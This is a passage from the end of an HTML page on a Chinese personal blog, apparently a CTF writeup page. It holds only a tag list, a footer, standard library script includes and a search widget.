                    <a class="level is-marginless" href="/tags/百度云/">
                        <span class="level-start">
                            <span class="level-item">百度云</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/笔记/">
                        <span class="level-start">
                            <span class="level-item">笔记</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/鹏程杯/">
                        <span class="level-start">
                            <span class="level-item">鹏程杯</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
            </ul>
        </div>
    </div>
</div>
    
    
</div>

            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.svg" alt="2018 DDCTF Web 部分writeup" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 Junay&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a
                        href="http://github.com/ppoffice/hexo-theme-icarus">Icarus</a>
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/delcoding">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>


    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {matchFontHeight: false},
        SVG: {matchFontHeight: false},
        CommonHTML: {matchFontHeight: false}
    });
});
</script>

    
    

<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>